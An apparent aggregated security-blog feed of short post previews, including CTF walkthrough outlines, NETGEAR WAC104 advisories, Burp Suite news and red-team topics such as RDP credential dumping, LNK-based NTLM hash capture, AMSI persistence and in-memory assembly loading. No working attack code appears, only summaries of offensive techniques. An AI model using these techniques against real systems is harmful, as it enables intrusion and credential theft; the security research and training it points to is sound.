    In 2020, cyber criminals used cloud applications, the cover of a pandemic, and a newly embraced work-from-home culture to serve up ransomware, steal data, and disrupt how companies do business. The year is over, but the challenges and risks remain.  How do we prevent these criminals from injecting chaos into our hybrid work environments? As […] The post Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments appeared first on Security Weekly.  ( 2 min )

  • Open

    Gears of Chaos vulnerability chain (NETGEAR WAC104 access point)
    As mentioned in previous post, NETGEAR WAC104 access point just had a couple of vulnerabilities patched and you should upgrade its firmware now if you own such a device at your company or at home (or anywhere else). Actually there might be more affected devices: WAC104 - fix available WNDR3700v5 - might be vulnerable (unconfirmed), …

  • Open

    How the Best Defense Gets Better
    Security starts before detection and response, but many organizations focus there first. Mature security teams understand the importance of identification and protection.  Establishing good cyber hygiene and taking proactive measures to secure themselves against the ever-increasing threat landscape is a critical first step in a holistic security program.  How should organizations build a holistic security […] The post How the Best Defense Gets Better appeared first on Security Weekly.  ( 2 min )

  • Open

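    About My Four Years at University
    Yesterday I went back to campus to move out; everything I had used over four years of university fit into just two large cardboard boxes. Time flies: I can still clearly picture the moment four years ago when my parents and I, luggage in hand, opened the dorm room door, and yet the time to leave has already come. Lately I have been feeling somewhat sad and reluctant to let go. Lying in bed after work and looking back on these four years, some moments stay with me, and after thinking it over I felt I ought to write a summary. So here I am, sitting for the last time at my dorm desk, now cleared out and empty, typing this. It may not have much logic; I will just write whatever comes to mind.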

  • Open

    What We Know About The Ransomware Economy
    Okay, I think that we can all admit that ransomware has consumed the news cycle of late, thanks to high visibility attacks such as Colonial Pipeline and JBS. Interestingly enough, there wasn't this sort of reaction the second time the City of Baltimore got attacked, which (IMHO) belies the news cycle more than anything else. However, while the focus is on ransomware, for the moment, it's a good time to point out that there's more to this than just the attacks that get blasted across news feeds. That is, ransomware itself is an economy, an eco-system, which is a moniker that goes a long way toward describing why victims of these attacks are impacted to the extent that they are. What I mean by this is that everything...EVERYTHING...about what goes into a ransomware attack is directed at t…  ( 6 min )
    Thoughts on Assessing Threat Actor Intent & Sophistication
    I was reading this Splunk blog post recently, and I have to say up front, I was disappointed by the fact that the promise of the title (i.e., "Detecting Cl0p Ransomware") was not delivered on by the remaining content of the post. Very early on in the blog post is the statement: Ransomware is by nature a post-exploitation tool, so before deploying it they must infiltrate the victim's infrastructure.  Okay, so at this point, I'm looking for something juicy, some information regarding the TTPs used to "infiltrate the victim's infrastructure" and to locate files of interest for staging and exfil, but instead, the author(s) dove right into analyzing the malware itself, through reverse engineering. Early in that malware RE exercise is the statement: This ransomware has a defense evasion feature …  ( 5 min )

  • Open

    Building XSS Polyglots
    XSS polyglots are quite popular among beginners and lazy XSS testers since they only require a single copy and paste. Although doomed to be easily flagged by any decent filter or WAF, they can be useful to spot most of the XSS cases out there. Here we will try to build a cost-effective XSS polyglot, … Continue reading Building XSS Polyglots The post Building XSS Polyglots appeared first on Brute XSS.
  • Open

    Making the Case for Supply Chain Behavior Transparency
    The Biden Administration’s Cyber Executive Order includes a Software Bill of Materials (SBOM), an electronically readable format designed to provide an inventory of third-party components that make up software components. It is a critical and necessary first measure for protecting the software supply chain, but is it enough? One of the biggest challenges to supply chain transparency […] The post Making the Case for Supply Chain Behavior Transparency appeared first on Security Weekly.  ( 2 min )
  • Open

    WAC104 vulnerabilities - please go patch (details on Monday)
    Just a short post (I will publish a longer one with details on Monday) – if you have the following NETGEAR access point, you should upgrade your firmware now: WAC104 NETGEAR's advisory and the firmware can be found here: Security Advisory for Authentication Bypass on WAC104, PSV-2021-0075 WAC104 — Dual Band 802.11ac Wireless Access Point – Firmware and Software Downloads Please note that NETGEAR assigned a CVSS v3.1 score of 8.8 (High), which is incorrect (unless I misread the CVSS specification) - it's actually 9.8 (Critical): Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H This firmware also fixes a couple of other vulnerabilities with lower CVSS scores. More details on Monday. P.S. This vulnerability chain is dubbed Gears of Chaos (in line with my sense of humor).

  • Open

    Introducing Striker and the Payload Automation Libraries
    TL;DR – Striker, Compyler, Artifactor, Sleepy, and Detemplate are a set of Python libraries we created to help make building custom payloads faster, more consistent, and more OPSEC safe and allow for better IoC tracking during Red Team operations. The libraries can be found on GitHub here: https://github.com/emcghee/PayloadAutomation. Introduction During an operation, we were creating a custom initial access payload which would execute a Cobalt Strike Beacon. The payload was fairly complex with multiple components coming together and multiple steps to obfuscate the shellcode before embedding it into the payload. During the preparation phase of the operation, we went through multiple profile and listener variations and needed to test our initial access payload with each variation. This m…
  • Open

    BSides Cleveland 2021 Videos
    BSides Cleveland 2021 Videos These are the videos from the Bsides Cleveland conference. Thanks to Rich, securid as the video team. Thanks to twuntymcslore & RockieBrockway for being con mom & dad. These are the first con recordings I've done in 1 year and 3 months. It seems something may have changed after some updates. These OBS videos have variable audio sync problems that are not a set number of milliseconds I could easily set the same sync settings to. I fixed them the best I could, but I've included the raw files if someone can figure a better way to fix variable sync delays. Contact me if you find a better way. Ministraitor (my European counterpart that does more cons than me) gave me some tips to fix future problems. Intro Rockie Brockway I Don t Know Snow Computer Forensics Case Files Tyler Hudak Improving Cyber Security Alex Kot Lend Me You IRs Matt Scheurer Tale From The Audit Justin Leapline Table Top Jeremy Mio Vulnerability Disclosure Policies Hack Responsibly MzBat Pentest Stories Justin Bollinger Advisor Person Rick Yocum

  • Open

    Changes to Chrome OS’s release cycle
    We previously announced that Chrome will soon release a new milestone every 4 weeks, starting with Chrome 94 in Q3 of 2021. We’re excited to also share our plans today for adjusting the Chrome OS release schedule. To deliver new features more rapidly to consumers while also continuing to prioritize the key pillars of Chrome OS – security, stability, speed and simplicity – Chrome OS will move to a 4-week stable channel starting with M96 in Q4. For enterprise and education users, Chrome OS will also introduce a new channel with a 6-month update cadence by M96. More details to be announced soon. To bridge the gap between M94 when Chrome moves to a four week release and M96, Chrome OS will skip M95 (see the updated Chrome schedule page for milestone-specific details). As we head into our next decade, these changes enable us to evolve Chrome OS to keep helping people get things done and to provide more helpful and secure experiences. Marina Kazatcker, Chrome OS Release TPM Lead

  • Open

    TryHackMe > Unbaked Pie
    Don’t over-baked your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…
  • Open

    Toolmarks: LNK Files in the news again
    As most regular readers of this blog can tell you, I'm a bit of a fan of LNK files...a LNK-o-phile, if you will. I'm not only fascinated by the richness of the structure, but as I began writing a parser for LNK files, I began to see some interesting aspects of intelligence that can be gleaned from LNK files, in particular, those created within a threat actor's development environment, and deployed to targets/infrastructures. First, there are different ways to create LNK files using the Windows API, and what's really cool is that each method has its own unique #toolmarks associated with it! Second, most often there is a pretty good amount of metadata embedded in the LNK file structure. There are file system time stamps, and often we'll see a NetBIOS system name, a volume S/N, a SID, or o…  ( 5 min )
    Testing, and taking DFIR a step further
    One of Shakespeare's lines from Hamlet I remember from high school is, "...there are more things on heaven and earth, Horatio, than are dreamt of in your philosophy." And that's one of the great things about the #DFIR industry...there's always something new. I do not for a moment think that I've seen everything, and I, for one, find it fascinating when we find something that is either new, or that has been talked about but is being seen "in the wild" for the first time. Someone mentioned recently that Microsoft's Antimalware Scan Interface (i.e., AMSI) could be used for persistence, and that got me very interested. This isn't something specifically or explicitly covered by the MITRE ATT&CK framework, and I wanted to dig into this a bit more to understand it. As it can be used for persisten…  ( 5 min )

  • Open

    Chrome 92: Web Apps as File Handlers, New JavaScript Features, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 92 is beta as of June 3, 2021 File Handling API Now that web apps are capable of reading and writing files, the next logical step is to let developers declare web apps as file handlers for files they create and process. The File Handling API allows you to do exactly this. For example, after a text editor PWA has registered itself as a file handler, you can right-click a .txt file in your operating system's file manager and instruct this PWA to (always or just once) open .txt files. This means PWAs are just a (double) click away from…

  • Open

    20 Burp Suite tips from the Burp user community
    The Burp Suite user community can easily be described as passionate, dedicated, and highly invested in the development of our product. That's why we love it when our users take it upon themselves to q  ( 5 min )

  • Open

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

  • Open

    Chrome is up to 23% faster in M91 and saves over 17 years of CPU time daily
    Since the launch of Chrome in 2008, speed has been one of the 4 core principles that shape the work we do to deliver a highly performant browser. The V8 JavaScript compiler is a critical part of delivering maximum speed for the JavaScript that’s shipped on practically every web page. In our next post in The Fast and the Curious series, we are excited to share how improvements to the V8 engine are delivering up to 23% faster performance. An important component of delivering a fast browser is fast JavaScript execution. In Chrome, that job is done by the V8 engine which executes over 78 years worth of JavaScript code on a daily basis. In M91 Chrome is now up to 23% faster with the launch of a new Sparkplug compiler and short builtin calls, saving over 17 years of our users' CPU time each da…
  • Open

    Some of the best Burp extensions - as chosen by you
    As we mentioned in our recent blog post on good resources for new Burp Suite Professional users, the BApp Store is one of the largest repositories of community-created user content you're likely to fi  ( 3 min )
  • Open

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

  • Open

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

  • Open

    Dumping RDP Credentials
    Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical for RDP to be enabled in systems that… Continue reading → Dumping RDP Credentials  ( 5 min )

  • Open

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

  • Open

    A few tips for the newcomers on this sub!
    This post is mainly intended to help the people who discover this sub to start with. It could also be useful for the other folks, who knows? What is an open directory? Open directories (aka ODs or opendirs) are just unprotected websites that you can browse recursively, without any required authentication. You can freely download individual files from them. They're organised in a folder structure, as a local directory tree on your computer. This is really convenient as you can also download several files in a bunch recursively (See below). These sites are sometimes deliberately left open and, sometimes, inadvertently (seedboxes, personal websites with some dirs badly protected, ...). For these last ones, often, after someone has posted them here, they're hammered by many concurrent downlo…  ( 8 min )
  • Open

    FAQ: Difference between vulnerability, exploit and CVE
    Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to find exploits in software? Q: How did you find this CVE? (in …

  • Open

    Great getting started resources for new users of Burp Suite Professional
    If you're new to Burp Suite Professional, then congratulations. Not only have you just bought into the world's leading toolkit for web security testing - you've also joined a massive worldwide communi  ( 5 min )

  • Open

    TryHackMe > Debug
    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …
  • Open

    VMware Workspace One and Flexera Address Software Vulnerabilities
    Keeping ahead of software vulnerabilities is a tough task. No matter the organization, industry, location or experience, vulnerable applications pop up all over the place all the time. The SolarWinds breach in late 2020 or the ransomware attack that closed down the Colonial Pipeline supplying nearly half the gasoline to the East Coast are just a couple of recent major examples of the effects of a breach, but they’re just waiting to happen every day. Luckily for all of us in the information technology industry, there are plenty of amazing hackers and security experts on the side of stopping these…

  • Open

    That single GraphQL issue that you keep missing
    With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations. GraphQL what? GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are: Aggregating data from multiple sources Decoupling the data from the database underneath, through a graph form Ensuring input type correctness with minimal effort from the developers CSRF eh? Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies. Gra…  ( 5 min )
  • Open

    An experiment in helping users and web publishers create deeper connections on Chrome
    Today, people have many ways to keep up with their favorite websites, including subscribing to mailing lists, notifications and RSS. It’s a lot for any one person to manage, so we’re exploring how to simplify the experience of getting the latest and greatest from your favorite sites directly in Chrome, building on the open RSS web standard. Our vision is to help people build a direct connection with their favorite publishers and creators on the web. In the coming weeks, some Android users in the US on Chrome Canary may see an experimental Follow feature designed to help people get the latest content from sites they follow. Our goal for this feature is to allow people to follow the websites they care about, from the large publishers to the small neighborhood blogs, by tapping a Follow button in Chrome. When websites publish content, users can see updates from sites they have followed in a new Following section on the New Tab page: Keeping a site’s RSS up-to-date will ensure Chrome can provide the latest content to users with this experiment. We will provide more guidance to web publishers as we learn and evaluate whether this feature will graduate from an experiment to a broader rollout in Chrome. We welcome feedback from publishers, bloggers, creators, and citizens of the open web (like you!) on this experiment as we aim to build deeper engagement between users and web publishers in Chrome. You can also stay up-to-date and ask us questions via @WebCreators on Twitter or via email to webcreators@google.com. As part of this year’s Google I/O, we’ll be hosting a Meet Up for web publishers, creators and developers who would like to learn more, ask questions and share feedback. You can sign up for I/O (free this year) and register for the Following on the Open Web session, being held on May 19 (today) at 11 AM PT. Posted by Janice Wong, Product Manager, Google Chrome

  • Open

    Persistence – AMSI
    AMSI (Antimalware Scan Interface) is a vendor agnostic interface which can communicate with the endpoint in order to prevent execution of malware. The scan performed… Continue reading → Persistence – AMSI  ( 5 min )

  • Open

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

  • Open

    TryHackMe > Wekor
    CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

  • Open

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…

  • Open

    Experience Burp Suite Enterprise Edition in a new live demo
    Quick link: Burp Suite Enterprise Edition live demo. Deploying enterprise-grade software isn't always easy. We wanted a quick way for people to see the core features of Burp Suite Enterprise Edition w  ( 2 min )

  • Open

    Assembly.Lie – Using Transactional NTFS and API Hooking to Trick the CLR into Loading Your Code “From Disk”
    Introduction: Assembly.Load, a method that has been one of the primary reasons for the meteoric rise in offensive tooling written in C# over the past few years.  Its most commonly used overload in offensive tooling – Assembly.Load(byte[]) allows for memory-only loading of .Net assembly objects (.exe / .dll) directly from a byte array representing the object’s contents, effectively granting the ability to reflectively load and execute a program entirely in memory in just 2-3 lines of code. This has enabled all sorts of multi-staged payloads, modular program functionality, and fileless post-exploitation operations.  A few months back some tooling I was working on caused me to take a closer look into the mechanisms behind loading assemblies into the .net Common Language Runtime (CLR).  I fou…

  • Open

    Hacking with ML
    Let's say that we want to train an ML model to hack web applications. What would that look like in practice? Let's do this thought experiment. We first need to define an environment where the agent (the ML model) can operate and essentially learn. In principle, this would necessitate boiling down the process of web hacking into a limited number of inputs that the agent needs to send in some combination and get rewarded for in return (let's think of this from the perspective of reinforcement learning). For this thought experiment, let's consider that the input is just three buttons (think of them as a game controller) which the agent can press to manipulate the environment. The agent will smash the buttons, and in return, it may get some reward for finding a vulnerability or getting pretty …
    Innovation is Nonlinear
    I am getting obsessed with the nonlinear way of discovering things. For example, let's say you want to use machine learning to classify many strings, but you don't know anything about this topic. The linear approach would be to start learning about ML from the basics, and once you have enough knowledge, you will be able to solve your specific problem. By the time you reach this point, you find out that your problem domain is not a good fit for what you've learned (your knowledge is not practical for the problem domain), and thus the experience is disappointing. The nonlinear way would go like this. You want to classify many strings using machine learning, but you don't know anything about this topic. You download brain.js and start doing some random problems not related to your problem domain which ultimately leads to a discovery or an insight in a different area. Now you innovate. The illusion everyone in tech has is that it is possible to develop innovative solutions by following a linear path: A, B, C, D. But, innovation is never linear. If innovation was linear, it would have been repeatable as it will be possible to work forward and backwards with relative ease. Instead, we know that innovation is random, and it comes from unexpected places.

  • Open

    Recorded logins in Burp Scanner
    If you’re using Burp Suite to test your website, it’s probably got some way for users to log in - and chances are it’s more complicated than filling in a username and password and hitting submit. Burp  ( 6 min )

  • Open

    On #DFIR Analysis, pt III - Benefits of a Structured Model
    In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering about the benefits to all this work. In this post, I'll take a shot at netting out some of the more obvious benefits. Maintaining Corporate Knowledge Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus…  ( 7 min )

  • Open

    On #DFIR Analysis, pt II - Describing Artifact Constellations
    I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts. I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?   Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit …  ( 9 min )

  • Open

    AppSec experts share Burp Suite automation secrets and best practices
    Webinar recording: How to Perform Effective Web Application Security Assessments On 6 April, PortSwigger teamed up with HackerOne to bring you AppSec insights from industry expert Burp Suite users. Le  ( 3 min )

  • Open

    LNK Files, Again
    I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication".  What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. What happens is that when the LNK file is launched, Explorer will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire.  As such, SharpWebServer is built to capture those hashes. What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change. Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are changed, the updated hashes will be sent across the wire. Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation".  Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting. However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.  ( 4 min )
    On #DFIR Analysis
    I wanted to take the opportunity to discuss DFIR analysis; when discussing #DFIR analysis, we have to ask the question, "what _is_ "analysis"?" In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches.  When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis.  However, these searches should not be considered the end of your analysis; rather, they are simply the beginning, or at least early stages of the analysis. The issue is that parsing data sources in isolation from each other and just runnin…  ( 10 min )

  • Open

    Simplified cloud deployment for Burp Suite Enterprise Edition
    Last year, we made Burp Suite Enterprise Edition cloud-friendly. Organizations migrating to the cloud, or taking a cloud-first approach, are able to deploy Burp Suite Enterprise Edition to AWS or Azur  ( 3 min )

  • Open

    PortSwigger teams up with HackerOne for AppSec workshop - 6 April
    Tuesday 6 April, 2021 | 10 AM PT / 1 PM ET / 6 PM GMT Update: this webinar can now be viewed on HackerOne's site, here. AppSec is a tricky business. While expertise remains scarce, threats are only ge  ( 3 min )

  • Open

    Extracting Toolmarks from Open Source Reporting, pt II
    On the heels of my previous post on this subject, I ran across this little gem from Microsoft regarding the print spooler EOP exploitation. I like articles like this because they illustrate threat actor activities outside the "norm", or what we usually tend to see in open reporting, if such things are illustrated in detail. Fig 4 (in step 1) in the article illustrates a new printer port being added to a Windows system as a step toward privilege escalation. This serves as one of the more-than-a-few interesting EDR-style tidbits from the article (i.e., detect the Powershell commandline), and also results in a fantastic toolmark that can be applied to DFIR "threat hunting".  The article illustrates, via fig 4, Powershell being used to add a printer port to the system, and that command results…  ( 5 min )
  • Open

    Improved CI/CD integrations in Burp Suite Enterprise Edition
    Burp Suite Enterprise Edition was designed to support your DevSecOps needs. One of the ways it does this is via our pre-built and generic CI/CD driver. This allows users to integrate with tooling of t  ( 4 min )

  • Open

    Browser powered scanning in Burp Suite
    Since the release of Browser powered scanning back in Burp Suite Professional 2020.8.1 we have had a lot of customers asking us about our motivation for choosing to integrate with Chromium and fo  ( 7 min )

  • Open

    API Scanning with Burp Suite
    Both Burp Suite Professional and Burp Suite Enterprise Edition contain Burp Scanner - allowing users to easily scan web applications for vulnerabilities. Other blog posts cover how Burp Scanner’s craw  ( 8 min )

  • Open

    Regexploit: DoS-able Regular Expressions
    When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes). Regular expressions are used for all manner of text-proce…  ( 6 min )

  • Open

    A Journey Combining Web Hacking and Binary Exploitation in Real World!
    No content preview
2022-03-09T01:21:18.976Z osmosfeed 1.14.4